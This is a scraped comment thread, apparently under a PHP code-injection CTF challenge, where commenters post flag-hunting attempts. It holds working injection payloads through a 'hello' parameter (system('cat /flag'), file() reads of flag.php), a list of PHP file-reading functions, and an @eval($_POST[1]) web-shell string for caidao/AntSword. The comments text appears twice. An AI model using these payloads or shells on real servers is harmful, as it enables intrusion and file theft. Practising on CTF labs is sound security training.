tnnd我好一个试这个too young too simple,哪个崽崽在此骗人
我也试过
?/hello=system('ls') > ?/hello=system('ls /') > ?/hello=system('cat /flag')
?hello=);system( 'cat flag.php'
index.php?hello=);print_r(file(%22./flag.php%22));//
$flag='Too Young Too Simple'
php
读取文件内容的函数: * show_source * highlight_file * file * file_get_contents + 查看源码(如果为php文件的话) * system('cat ***’) + 查看源码(如果为php文件的话) * system('more ***’) + 查看源码(如果为php文件的话) * system(’tac ***’) 逆序输出
构造 ?hello=@eval($_POST[1]) 上caidao或antsword
system('command') bypass
http://114.67.246.176:17326/ 我怀疑平台的并发没有做好,为什么我的这一题出来的是之前的 $what=$_GET['what'];<br> echo $what;<br> if($what=='flag')<br> echo 'flag{****}';<br>
nonono
...
评论
凤嘤嘤 2年前
举报
tnnd我好一个试这个too young too simple,哪个崽崽在此骗人
PPEEDD 2年前
举报
我也试过
18978702415 2年前
举报
?/hello=system('ls') > ?/hello=system('ls /') > ?/hello=system('cat /flag')
shiusec 2年前
举报
?hello=);system( 'cat flag.php'
YuJian~ 2年前
举报
index.php?hello=);print_r(file(%22./flag.php%22));//
zztaoe 2年前
举报
$flag='Too Young Too Simple'
Cassaundra 2年前
举报
php
Fitz_临风 2年前
举报
读取文件内容的函数: * show_source * highlight_file * file * file_get_contents + 查看源码(如果为php文件的话) * system('cat ***’) + 查看源码(如果为php文件的话) * system('more ***’) + 查看源码(如果为php文件的话) * system(’tac ***’) 逆序输出
max39 2年前
举报
构造 ?hello=@eval($_POST[1]) 上caidao或antsword
bk201 2年前
举报
system('command') bypass
system 2年前
举报
http://114.67.246.176:17326/ 我怀疑平台的并发没有做好,为什么我的这一题出来的是之前的 $what=$_GET['what'];<br> echo $what;<br> if($what=='flag')<br> echo 'flag{****}';<br>
200200 2年前
举报
nonono